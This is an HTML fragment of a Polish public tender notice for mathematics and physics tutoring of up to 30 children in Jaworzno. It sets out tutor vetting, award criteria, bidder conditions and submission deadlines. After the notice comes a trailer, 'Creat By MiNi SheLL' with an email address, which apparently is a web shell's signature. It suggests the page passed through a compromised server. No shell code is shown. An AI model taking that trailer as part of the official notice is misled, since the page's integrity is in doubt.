społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 – Korepetycje z matematyki.<br/>1.	Przedmiot zamówienia.<br/>1)	Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu oraz przeprowadzeniu korepetycji z matematyki.<br/>2)	Wykonawca realizować będzie korepetycje w formie indywidualnej pracy z każdym z uczestników projektu.	<br/>3)	Celem zajęć jest wyrównanie szans edukacyjnych uczestników projektu poprzez wsparcie w nauce oraz nadrabianie zaległości szkolnych.<br/>4)	Wsparciem zostanie objętych maksymalnie 30 dzieci uczęszczających do szkół podstawowych i ponadpodstawowych.<br/>5)	Wykonawca zobowiązuje się do sukcesywnej realizacji przedmiotu zamówienia przez okres 27 miesięcy, licząc od dnia podpisania umowy, jednak nie wcześniej niż od 1 października 2025 r. Zastrzega się, że w miesiącach lipiec i sierpień usługa może być realizowana w ograniczonym zakresie lub nie być świadczona. <br/>6) Osoba wskazana do realizacji zamówienia musi posiadać:<br/> a)pełną zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych;<br/> b)status osoby, która jest niekarana za umyślne przestępstwo przeciwko życiu i zdrowiu, przestępstwo przeciwko wolności seksualnej i obyczajowości, przestępstwo przeciwko rodzinie i opiece, z wyjątkiem przestępstwa określonego w art. 209 ustawy z dnia 6 czerwca 1997 r. – Kodeks karny, przestępstwo określone w rozdziale 7 ustawy z dnia 29 lipca 2005 r. o przeciwdziałaniu narkomanii albo wobec, której nie orzeczono zakazu prowadzenia działalności związanej z wychowywaniem, leczeniem, edukacją małoletnich lub opieką nad nimi lub zakazu przebywania w określonych środowiskach lub miejscach, kontaktowania się z określonymi osobami, zbliżania się do określonych osób lub opuszczania określonego miejsca pobytu bez zgody sądu;<br/> c)status osoby, która nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym.<br/>2. Liczba godzin wsparcia w formie korepetycji z matematyki wynosi: 624 Jedna godzina zajęć to 60 minut (pełna godzina zegarowa). Wskazana liczba godzin ma charakter maksymalny, natomiast minimalna gwarantowana realizacja wynosi 80% tej liczby.<br/>3. Zajęcia będą odbywać się w formie stacjonarnej. Wykonawca zapewni miejsce świadczenia usługi na terenie miasta Jaworzna. <br/>4. Zakres wsparcia.<br/>1)	Zakres merytoryczny zajęć obejmuje:<br/> a) pomoc w opanowaniu materiału realizowanego w szkole,<br/> b)nadrabianie zaległości edukacyjnych,<br/> c) wsparcie w odrabianiu prac domowych,<br/> d) przygotowanie do sprawdzianów, egzaminu ósmoklasisty, egzaminu maturalnego oraz innych, w zależności od potrzeb. <br/>5. Obowiązki korepetytora / Wykonawcy<br/>1)	Prowadzenie dokumentacji realizacji zajęć zgodnie z wytycznymi Zamawiającego, w tym m.in.:<br/> a) dziennik zajęć,<br/> b) listy obecności.<br/>2)	Sporządzanie comiesięcznych raportów ewaluacyjnych, zawierających:<br/> a)ocenę efektów wsparcia,<br/> b) liczbę przeprowadzonych godzin,<br/> c) rekomendacje dotyczące dalszego rozwoju edukacyjnego uczestników.<br/>3)	Realizacja usług w sposób staranny, skuteczny i terminowy, zgodnie z harmonogramem ustalonym z:<br/> a) Działem Pieczy Zastępczej,<br/> b) uczestnikami projektu.<br/>4)	Utrzymywanie stałego kontaktu z Działem Strategii i Rozwoju Usług Społecznych i Działem Pieczy Zastępczej, w tym:<br/> a) niezwłoczne zgłaszanie problemów,<br/> b) terminowe przekazywanie dokumentów rozliczeniowych po zakończeniu miesiąca.<br/>5)	Prowadzenie zajęć od poniedziałku do soboty, z uwzględnieniem planu zajęć szkolnych uczestników.	<br/>6)	Zapewnienie materiałów i pomocy dydaktycznych niezbędnych do realizacji zajęć.<br/>6. Warunki organizacyjne.<br/>1)	Zajęcia kierowane są do dzieci uczęszczających do szkół podstawowych i ponadpodstawowych.<br/>2)	Osoba prowadząca zajęcia musi posiadać wiedzę odpowiednią do poziomu nauczania uczestnika.<br/>7. Dodatkowe informacje i warunki realizacji usług.<br/>1)	Wśród uczestników zajęć mogą znajdować się osoby z niepełnosprawnościami.<br/>2)	Wykonawca zobowiązany jest do zapewnienia we własnym zakresie sprawnego technicznie sprzętu niezbędnego do prawidłowego i zgodnego z celem zamówienia wykonania usługi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80200000-6 - Usługi szkolnictwa średniego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">27 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 – Korepetycje z fizyki. <br/>1. Przedmiot zamówienia.<br/>1)	Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu oraz przeprowadzeniu korepetycji z fizyki.<br/>2)	Wykonawca realizować będzie korepetycje w formie indywidualnej pracy<br/>z każdym z uczestników projektu.	<br/>3)	Celem zajęć jest wyrównanie szans edukacyjnych uczestników projektu poprzez wsparcie w nauce oraz nadrabianie zaległości szkolnych.<br/>4)	Wsparciem zostanie objętych maksymalnie 30 dzieci uczęszczających do szkół podstawowych i ponadpodstawowych.<br/>5)	Wykonawca zobowiązuje się do sukcesywnej realizacji przedmiotu zamówienia przez okres 27 miesięcy, licząc od dnia podpisania umowy, jednak nie wcześniej niż od 1 października 2025 r. Zastrzega się, że w miesiącach lipiec<br/>i sierpień usługa może być realizowana w ograniczonym zakresie lub nie być świadczona. <br/>6) Osoba wskazana do realizacji zamówienia musi posiadać:<br/> a)pełną zdolność do czynności prawnych oraz korzystanie z pełni praw publicznych;<br/> b) status osoby, która jest niekarana za umyślne przestępstwo przeciwko życiu i zdrowiu, przestępstwo przeciwko wolności seksualnej i obyczajowości, przestępstwo przeciwko rodzinie i opiece, z wyjątkiem przestępstwa określonego w art. 209 ustawy z dnia 6 czerwca 1997 r. – Kodeks karny, przestępstwo określone w rozdziale 7 ustawy z dnia 29 lipca 2005 r. o przeciwdziałaniu narkomanii albo wobec, której nie orzeczono zakazu prowadzenia działalności związanej z wychowywaniem, leczeniem, edukacją małoletnich lub opieką nad nimi lub zakazu przebywania w określonych środowiskach lub miejscach, kontaktowania się z określonymi osobami, zbliżania się do określonych osób lub opuszczania określonego miejsca pobytu bez zgody sądu;<br/> c) status osoby, która nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym.<br/>2. Liczba godzin wsparcia w formie korepetycji z fizyki wynosi: 192. Jedna godzina zajęć to 60 minut (pełna godzina zegarowa). Wskazana liczba godzin ma charakter maksymalny, natomiast minimalna gwarantowana realizacja wynosi 80% tej liczby.<br/>3.	Zajęcia będą odbywać się w formie stacjonarnej. Wykonawca zapewni miejsce świadczenia usługi na terenie miasta Jaworzna. <br/>4. Zakres wsparcia.<br/>Zakres merytoryczny zajęć obejmuje:<br/> a) pomoc w opanowaniu materiału realizowanego w szkole,<br/> b) nadrabianie zaległości edukacyjnych,<br/> c wsparcie w odrabianiu prac domowych,<br/> d) przygotowanie do sprawdzianów, egzaminu maturalnego oraz innych, w zależności od potrzeb. <br/>5. Obowiązki korepetytora / Wykonawcy.<br/>1)	Prowadzenie dokumentacji realizacji zajęć zgodnie z wytycznymi Zamawiającego, w tym m.in.:<br/> a) dziennik zajęć,<br/> b) listy obecności.<br/>2) Sporządzanie comiesięcznych raportów ewaluacyjnych, zawierających:<br/> a) ocenę efektów wsparcia,<br/> b) liczbę przeprowadzonych godzin,<br/> c) rekomendacje dotyczące dalszego rozwoju edukacyjnego uczestników.<br/>3)	Realizacja usług w sposób staranny, skuteczny i terminowy, zgodnie z harmonogramem ustalonym z:<br/> a) Działem Pieczy Zastępczej,<br/> b) uczestnikami projektu.<br/>4)	Utrzymywanie stałego kontaktu z Działem Strategii i Rozwoju Usług Społecznych i Działem Pieczy Zastępczej, w tym:<br/> a) niezwłoczne zgłaszanie problemów,<br/> b) terminowe przekazywanie dokumentów rozliczeniowych po zakończeniu miesiąca.<br/>5)	Prowadzenie zajęć od poniedziałku do soboty, z uwzględnieniem planu zajęć szkolnych uczestników.	<br/>6)	Zapewnienie materiałów i pomocy dydaktycznych niezbędnych do realizacji zajęć.<br/>6. Warunki organizacyjne.<br/>1)	Zajęcia kierowane są do dzieci uczęszczających do szkół podstawowych i ponadpodstawowych.<br/>2)	Osoba prowadząca zajęcia musi posiadać wiedzę odpowiednią do poziomu nauczania uczestnika.<br/>7. Dodatkowe informacje i warunki realizacji usług.<br/>1)	Wśród uczestników zajęć mogą znajdować się osoby <br/>z niepełnosprawnościami.<br/>2)	Wykonawca zobowiązany jest do zapewnienia we własnym zakresie sprawnego technicznie sprzętu niezbędnego do prawidłowego i zgodnego z celem zamówienia wykonania usługi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80200000-6 - Usługi szkolnictwa średniego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">27 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym: <br/> Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/>3)	Sytuacji ekonomicznej lub finansowej:<br/> Zamawiający nie określa szczegółowego warunku w tym zakresie.<br/>4)	Zdolności technicznej lub zawodowej:<br/><br/>Warunek zostanie uznany za spełniony, jeśli Wykonawca wykaże,<br/>że dysponuje przynajmniej jedną osobą, którą skieruje do realizacji zamówienia i która posiada: <br/>	<br/>Część 1 – Korepetycje z języka angielskiego. <br/> minimum roczne doświadczenie w nauczaniu języka angielskiego dzieci i/lub młodzieży w szkołach lub innych placówkach oświatowych, edukacyjnych bądź wychowawczych. <br/>Część 2 – Korepetycje z języka polskiego.<br/> minimum roczne doświadczenie w nauczaniu języka polskiego dzieci i/lub młodzieży w szkołach lub innych placówkach oświatowych, edukacyjnych bądź wychowawczych. <br/>Część 3 – Korepetycje z matematyki. <br/> minimum roczne doświadczenie w nauczaniu matematyki dzieci i/lub młodzieży w szkołach lub innych placówkach oświatowych, edukacyjnych bądź wychowawczych.<br/>Część 4 – Korepetycje z fizyki.<br/> minimum roczne doświadczenie w nauczaniu fizyki dzieci i/lub młodzieży w szkołach lub innych placówkach oświatowych, edukacyjnych bądź wychowawczych;<br/><br/>Zamawiający nie określa szczegółowego sposobu spełniania warunku określonego w rozdziale XXIV ust. 2 pkt 4, przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (brak skorzystania z dyspozycji zawartej w art. 117 ust. 1 ustawy Pzp) oraz analogicznie w sytuacji, gdy Wykonawca będzie polegał na zasobach innego podmiotu, na zasadach określonych w art. 118 ustawy Pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia – w terminie nie krótszym niż 5 dni od dnia otrzymania wezwania – niżej wskazanych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>1)	Podmiotowe środki dowodowe potwierdzające brak podstaw do wykluczenia:<br/>a)	Oświadczenia Wykonawcy o aktualności informacji zawartych<br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.	<br/>Uwaga: W przypadku Wykonawców wspólnie ubiegających się o zamówienie, podmiotowe środki dowodowe, o których mowa powyżej w Rozdziale XXV ust. 1 pkt 1a składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>Uwaga: Zamawiający żąda od Wykonawcy, który polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedstawienia podmiotowego środka dowodowego, o którym mowa w Rozdziale XXV ust. 1 pkt 1a, dotyczącego tych podmiotów, potwierdzającego brak podstaw do ich wykluczenia z postępowania</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Prawo zamówień publicznych, Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia – w terminie nie krótszym niż 5 dni od dnia otrzymania wezwania – niżej wskazanych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:<br/>Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej, zamawiający żąda:<br/>a) Wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego (w zakresie niezbędnym do wykazania spełnienia warunku zdolności technicznej i zawodowej, o których mowa w rozdziale XXIV ust. 2 pkt 4 niniejszej SWZ). Wzór oświadczenia stanowi załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy - zał. nr 1 do SWZ<br/>2. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, o niepodleganiu wykluczeniu z postępowania oraz spełnianiu warunków udziału w postępowaniu - załącznik nr 2<br/>3. Wykonawca, w przypadku polegania na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, przedstawia wraz ze swoim oświadczeniem, o którym mowa w ust. 4 pkt 1, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim Wykonawca powołuje się na jego zasoby. Wzór oświadczenia stanowi Załącznik nr 3 SWZ.<br/>4. Odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia jak również w imieniu podmiotów udostępniających zasoby, jest umocowana do jego reprezentowania.<br/>5.Pełnomocnictwo lub inny dokument potwierdzający umocowanie<br/>do reprezentowania Wykonawcy.<br/>6. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 ustawy Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji przedmiotowego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – dotyczy Wykonawcy, który polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, w celu potwierdzenia spełniania warunków udziału w postępowaniu. Wzór stanowi załącznik nr 5 do SWZ.<br/>7. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączą do oferty oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp (konsorcja, spółki cywilne). Wzór oświadczenia stanowi załącznik nr 6 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Informacja o możliwości składania jednej oferty przez dwa lub więcej podmiotów (oferty wspólne).<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (możliwość składania jednej oferty przez dwa lub więcej podmiotów np. konsorcjum, spółkę cywilną).<br/>2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego dołącza Pełnomocnictwo do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego lub wszyscy wspólnicy podpiszą ofertę.<br/>3)W przypadku Wykonawców będących spółką cywilną, zaleca się aby pełnomocnictwo do reprezentowania wspólników jako Wykonawców wspólnie ubiegających się o zamówienie, zostało podpisane przez wszystkich wspólników spółki cywilnej. W przypadku spółki cywilnej dokumentami zastępującymi pełnomocnictwo mogą być umowa spółki lub uchwała wspólników, wskazująca jednego ze wspólników jako umocowanego do reprezentacji spółki (wszystkich wspólników). W przypadku konsorcjum ustanowienie pełnomocnika może być dokonane w umowie konsorcjum lub w odrębnym dokumencie pełnomocnictwa. <br/>4)	Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>5) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, składa każdy z Wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>6)	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy.<br/>7)	Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia są opisane w projektowanych postanowieniach umowy - załącznik nr 4a, 4b, 4c, 4d do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę na Platformie e-zamówienia za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com